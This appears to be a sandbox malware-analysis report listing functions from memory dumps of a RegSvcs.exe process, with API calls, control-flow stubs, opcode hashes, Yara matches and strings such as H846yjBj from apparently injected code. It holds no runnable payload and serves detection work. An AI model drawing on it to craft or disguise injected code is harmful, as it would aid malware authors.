                                                                  control_flow_graph 396 42c7c3-42c7fc call 404653 call 42da03 NtClose
                                                                  APIs
                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C7F7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                                  • Instruction ID: 655702566d971be8828d1eb074539a96951f6316c6bda2febc2cf9207e520fe9
                                                                  • Opcode Fuzzy Hash: 4b864a366b5b27e43805e6b99a6c495b5a065df10857e84a8a109e2f0984c103
                                                                  • Instruction Fuzzy Hash: B3E046362042547BC220BA5AEC41FDB776DEBC5754F00441AFA08A7241D6B6BA158BE8
                                                                  Function 016D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 410 16d2b60-16d2b6c LdrInitializeThunk
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3ba9f0fcc7bc19f0458089a45cda1161002dd30b81ae155e293da09be22d61ad
                                                                  • Instruction ID: 7717d4a7af475cfb367eba90537a68cc4a00c137075e44ac92c6ad4b089dc974
                                                                  • Opcode Fuzzy Hash: 3ba9f0fcc7bc19f0458089a45cda1161002dd30b81ae155e293da09be22d61ad
                                                                  • Instruction Fuzzy Hash: 49900261203400034105755C4818617404E97E0201B55C121E5014A90EC52589916225
                                                                  Function 016D2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 7cea0886b692f664765ac71469c9d8494c71fabb930bb38183d12fa6bad13526
                                                                  • Instruction ID: 6ed4820aada1423bbf4f4f60d513ca7212ab44ff512a5394069aea06052cb639
                                                                  • Opcode Fuzzy Hash: 7cea0886b692f664765ac71469c9d8494c71fabb930bb38183d12fa6bad13526
                                                                  • Instruction Fuzzy Hash: 0D90023120240413D111755C4908707004D97D0241F95C512A4424A58ED6568A52A221
                                                                  Function 016D2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: ed9efaa1c8d3ac3407ac468c2208da610f02fb1f1333d04e92eb47bb83164ff9
                                                                  • Instruction ID: 288f8675e09a690ddc82b374e771f448b7ced65557117f7ad838067794e8dc42
                                                                  • Opcode Fuzzy Hash: ed9efaa1c8d3ac3407ac468c2208da610f02fb1f1333d04e92eb47bb83164ff9
                                                                  • Instruction Fuzzy Hash: 0290023120248802D110755C880874B004997D0301F59C511A8424B58EC69589917221
                                                                  Function 016D35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 6c43f64ee2cb80540d37f59dc510ecfb205e1d162f12ce7948337010f5abd823
                                                                  • Instruction ID: c0b37a149e9c0b9247451601b2fb4c6281ec8de63b7ad062405388ed698ba3bb
                                                                  • Opcode Fuzzy Hash: 6c43f64ee2cb80540d37f59dc510ecfb205e1d162f12ce7948337010f5abd823
                                                                  • Instruction Fuzzy Hash: 9590023160650402D100755C4918707104997D0201F65C511A4424A68EC7958A5166A2
                                                                  Function 0041404F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66threadwindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID: H846yjBj$H846yjBj
                                                                  • API String ID: 1836367815-1638195495
                                                                  • Opcode ID: ef7a9ffdf6561eef383bbc0664de7790ce42323556bf1a7fe240d511c29f7c54
                                                                  • Instruction ID: 3c683207899974e191189142c536af44746b7e051b83f101aac545a713f4ebdb
                                                                  • Opcode Fuzzy Hash: ef7a9ffdf6561eef383bbc0664de7790ce42323556bf1a7fe240d511c29f7c54
                                                                  • Instruction Fuzzy Hash: D7018C71A0524C7FE7129EA0AC82CEFFBACDE82754B0481DEF61097251C6355E428791
                                                                  Function 00414086 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65threadwindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 10 414086-4140d0 call 42e933 call 42f343 call 417853 18 4140d7-4140fd call 424f43 10->18 19 4140d2 call 4045c3 10->19 22 41411d-414123 18->22 23 4140ff-41410e PostThreadMessageW 18->23 19->18 23->22 24 414110-41411a 23->24 24->22
                                                                  APIs
                                                                  • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID: H846yjBj$H846yjBj
                                                                  • API String ID: 1836367815-1638195495
                                                                  • Opcode ID: 1e575f985c92c78392c5d7947edd5ded7c5b5c375e9d7c50ded5dd71fbab49a2
                                                                  • Instruction ID: 7b3e0f07fc7c6ddc1f756203e9316b04f6aa799e2925db75b152c8468b4ea2e0
                                                                  • Opcode Fuzzy Hash: 1e575f985c92c78392c5d7947edd5ded7c5b5c375e9d7c50ded5dd71fbab49a2
                                                                  • Instruction Fuzzy Hash: 9F114CB1E0011C7EDB01EBE19C82DEFBB7CDF81798F40806AFA04A7141D6785E068BA1
                                                                  Function 00414093 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 25 414093-4140d0 call 42e933 call 42f343 call 417853 33 4140d7-4140fd call 424f43 25->33 34 4140d2 call 4045c3 25->34 37 41411d-414123 33->37 38 4140ff-41410e PostThreadMessageW 33->38 34->33 38->37 39 414110-41411a 38->39 39->37
                                                                  APIs
                                                                  • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID: H846yjBj$H846yjBj
                                                                  • API String ID: 1836367815-1638195495
                                                                  • Opcode ID: 984f09a5dd09cd233dbe0f3a3a71350ed3a96ed15f6ad2f6789276278f6a4a35
                                                                  • Instruction ID: 01bac9bffc664040b2840fdb37e185e6924918b58f593d4067fc296cad9bf454
                                                                  • Opcode Fuzzy Hash: 984f09a5dd09cd233dbe0f3a3a71350ed3a96ed15f6ad2f6789276278f6a4a35
                                                                  • Instruction Fuzzy Hash: 5B01D6B1D0011C7AEB11ABE19C82DEFBB7CDF81798F40806AFA14B7141D6785E464BB5
                                                                  Function 00414124 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49threadwindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 40 414124 call 42e933 call 42f343 call 417853 48 4140d7-4140fd call 424f43 40->48 49 4140d2 call 4045c3 40->49 52 41411d-414123 48->52 53 4140ff-41410e PostThreadMessageW 48->53 49->48 53->52 54 414110-41411a 53->54 54->52
                                                                  APIs
                                                                  • PostThreadMessageW.USER32(H846yjBj,00000111,00000000,00000000), ref: 0041410A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID: H846yjBj$H846yjBj
                                                                  • API String ID: 1836367815-1638195495
                                                                  • Opcode ID: d81ff8332ae71bd7ece2f7822f94f5d0f07d4ea2383a445a210605cec379552c
                                                                  • Instruction ID: a53e75af234e0e2e8dc2ff362a0ab489f932a6b22d02496a9ffdf3fd85ddbe1d
                                                                  • Opcode Fuzzy Hash: d81ff8332ae71bd7ece2f7822f94f5d0f07d4ea2383a445a210605cec379552c
                                                                  • Instruction Fuzzy Hash: 1101F2B2D0011C7ADB11AAE19C82DEFBB7CDF81798F41806AFA04B7101D63C4E464BA5
                                                                  Function 0042CAE3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 386 42cae3-42cb27 call 404653 call 42da03 RtlAllocateHeap
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(?,0041E634,?,?,00000000,?,0041E634,?,?,?), ref: 0042CB22
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                                  • Instruction ID: 02f8b4c6de11923e5652d0b1f4fbb4dcd003679feaa33a1029ac6aba649ea141
                                                                  • Opcode Fuzzy Hash: ab17b47021c6a0295688baa9bc7f5b74f4096b25377d82b86614dd7a19cdddd4
                                                                  • Instruction Fuzzy Hash: BDE09271604254BBC610EE99DC42FDB73ADEFC9714F004419FE08A7281D771B92187B8
                                                                  Function 0042CB33 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 391 42cb33-42cb74 call 404653 call 42da03 RtlFreeHeap
                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5B5E5FE1,00000007,00000000,00000004,00000000,004170BD,000000F4), ref: 0042CB6F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                                  • Instruction ID: 88be9b9c6e7c59d6deab935c3c2594d1acbce9d117d58b86ffaeade349e087e0
                                                                  • Opcode Fuzzy Hash: 74b9442f213fd3182763185ae7e99eac7d520918a63298e6a42031909f51ab9e
                                                                  • Instruction Fuzzy Hash: 58E06D712043047BE610EE99EC41FDB33ADEFC5710F004419FA18A7282DA75B9108AB8
                                                                  Function 0042CB83 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 401 42cb83-42cbbc call 404653 call 42da03 ExitProcess
                                                                  APIs
                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,20989162,?,?,20989162), ref: 0042CBB7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2615113559.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_400000_RegSvcs.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: bc082ca53517514892f10464e003e6611e059de3d739efd828c9c0662ba77a05
                                                                  • Instruction ID: 4425423616075f17903b9c30fbfbf6d552649cbcaebd69dcc1db9d7e0672c02a
                                                                  • Opcode Fuzzy Hash: bc082ca53517514892f10464e003e6611e059de3d739efd828c9c0662ba77a05
                                                                  • Instruction Fuzzy Hash: 9CE086356042157BD210FA5ADC01FAF775CDFC5755F00842AFA08A7282D775790087F4
                                                                  Function 016D2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 406 16d2c0a-16d2c0f 407 16d2c1f-16d2c26 LdrInitializeThunk 406->407 408 16d2c11-16d2c18 406->408
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 7c0f213039a104e1e1568c6bc154d4a5b1874e273e67ef28718456ebb893e816
                                                                  • Instruction ID: ba76f9ab6ac0d39e23c2995f7bb9df5ffb78c63a8cf16095b39b44ae380ab899
                                                                  • Opcode Fuzzy Hash: 7c0f213039a104e1e1568c6bc154d4a5b1874e273e67ef28718456ebb893e816
                                                                  • Instruction Fuzzy Hash: 99B09B71D025C5C5DA52E7644E0C717794477D0701F15C165D2030751F4738C5D1E275

                                                                  Non-executed Functions

                                                                  Function 01712349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-2160512332
                                                                  • Opcode ID: 29dc488e04adfd4febe926a518d43ba1d4bf61e866ff7755385c1165d9325dca
                                                                  • Instruction ID: aa9889d8c47b22913551357996b02baba02d8abd9f37ec9efc71c4392e746fcb
                                                                  • Opcode Fuzzy Hash: 29dc488e04adfd4febe926a518d43ba1d4bf61e866ff7755385c1165d9325dca
                                                                  • Instruction Fuzzy Hash: 2F929B71608342AFE721DE28CC80B6BF7E9BB84710F24492DFA95D7256D770E844CB96
                                                                  Function 016C8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Invalid debug info address of this critical section, xrefs: 017054B6
                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 01705543
                                                                  • undeleted critical section in freed memory, xrefs: 0170542B
                                                                  • 8, xrefs: 017052E3
                                                                  • Address of the debug info found in the active list., xrefs: 017054AE, 017054FA
                                                                  • Thread identifier, xrefs: 0170553A
                                                                  • corrupted critical section, xrefs: 017054C2
                                                                  • Critical section debug info address, xrefs: 0170541F, 0170552E
                                                                  • Critical section address., xrefs: 01705502
                                                                  • double initialized or corrupted critical section, xrefs: 01705508
                                                                  • Critical section address, xrefs: 01705425, 017054BC, 01705534
                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017054E2
                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 017054CE
                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0170540A, 01705496, 01705519
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                  • API String ID: 0-2368682639
                                                                  • Opcode ID: b31ab8f63b26d643c6124f2a0c2874f66fc0acc0090af59d5cbff90f7a60c9cc
                                                                  • Instruction ID: 007e2caeb1fb2ac7ae096a38f4a2b632a55811a96d51ece2d99ee9bc9a9c36f3
                                                                  • Opcode Fuzzy Hash: b31ab8f63b26d643c6124f2a0c2874f66fc0acc0090af59d5cbff90f7a60c9cc
                                                                  • Instruction Fuzzy Hash: 70815AB1A41358EEEB21CF99CC45BAEFBF9EB09B14F204159F505B7280D3B5A941CB60
                                                                  Function 016C29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • @, xrefs: 0170259B
                                                                  • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01702624
                                                                  • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 017022E4
                                                                  • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 017025EB
                                                                  • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01702498
                                                                  • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01702602
                                                                  • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01702412
                                                                  • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01702506
                                                                  • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01702409
                                                                  • RtlpResolveAssemblyStorageMapEntry, xrefs: 0170261F
                                                                  • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 017024C0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                  • API String ID: 0-4009184096
                                                                  • Opcode ID: 02502ce8fe6ff046d272693c2a5eaca81f80aeb5fe959854ba9db0b0c8040b87
                                                                  • Instruction ID: 8674e35bab41e631af36498c8ee708baf9dc0525304411c6c34e7639bc96057c
                                                                  • Opcode Fuzzy Hash: 02502ce8fe6ff046d272693c2a5eaca81f80aeb5fe959854ba9db0b0c8040b87
                                                                  • Instruction Fuzzy Hash: FD0262B2D002299BDB71DB54CC94BE9F7B8AB54704F0141EEEA09A7242DB709E84CF59
                                                                  Function 01738B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                  • API String ID: 0-2515994595
                                                                  • Opcode ID: 6903002841003fd40cb4af7369295939b917625b38bae8b6f997dc918afde3d1
                                                                  • Instruction ID: bd25d48b0f0e20ea763259efc8c3d0219ea275232a53d57d15f78ca3c162e7fd
                                                                  • Opcode Fuzzy Hash: 6903002841003fd40cb4af7369295939b917625b38bae8b6f997dc918afde3d1
                                                                  • Instruction Fuzzy Hash: B951AE715143019BD325CF288C48BABBBECEFD8654F144A6DB99983242E770D644CB93
                                                                  Function 01740274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                  • API String ID: 0-1700792311
                                                                  • Opcode ID: b6ab4884e6111d501aa1931de26579d9e06d1abdf0481de2daf73610ce4b206f
                                                                  • Instruction ID: c94804ea10fc84dbda0dc1b9f1451bb8b918d104a48dce887f55891e86f6fc0d
                                                                  • Opcode Fuzzy Hash: b6ab4884e6111d501aa1931de26579d9e06d1abdf0481de2daf73610ce4b206f
                                                                  • Instruction Fuzzy Hash: ECD1CE31600686DFDB22EF68C841AEDFBF2FF4A720F188149F6469B252C7749941CB55
                                                                  Function 017189B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • VerifierDebug, xrefs: 01718CA5
                                                                  • AVRF: -*- final list of providers -*- , xrefs: 01718B8F
                                                                  • VerifierDlls, xrefs: 01718CBD
                                                                  • VerifierFlags, xrefs: 01718C50
                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01718A3D
                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01718A67
                                                                  • HandleTraces, xrefs: 01718C8F
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                  • API String ID: 0-3223716464
                                                                  • Opcode ID: 8b923776b839ea89adb24d636b0b24292568fb1224331eac6dcad41f515ba262
                                                                  • Instruction ID: bfaf7ebd862d12c32827ec55c8e551b5e0c59ee2fe0c9186e1071b2f48f80727
                                                                  • Opcode Fuzzy Hash: 8b923776b839ea89adb24d636b0b24292568fb1224331eac6dcad41f515ba262
                                                                  • Instruction Fuzzy Hash: 269135B2685312AFD721EF6CCC80B6AFBA5FB94B24F14455CFA416B248C7309D01CB96
                                                                  Function 016C63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-792281065
                                                                  • Opcode ID: ca98fc6b65942bbb2a845da587a472999663d833afad8fdb7e7f84b9a0524fba
                                                                  • Instruction ID: bc85aa46e0e3e93060ec262a30cf2ffc0582f7010298ea843f16e9a5eeb32669
                                                                  • Opcode Fuzzy Hash: ca98fc6b65942bbb2a845da587a472999663d833afad8fdb7e7f84b9a0524fba
                                                                  • Instruction Fuzzy Hash: F591F370B41315DBEB26DF18DC94BAEFBE1EB50B24F24812CEA066B385D7609842C795
                                                                  Function 0168645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 016E9A2A
                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016E99ED
                                                                  • apphelp.dll, xrefs: 01686496
                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 016E9A11, 016E9A3A
                                                                  • LdrpInitShimEngine, xrefs: 016E99F4, 016E9A07, 016E9A30
                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 016E9A01
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.2622319197.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1660000_RegSvcs.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                  • API String ID: 0-204845295
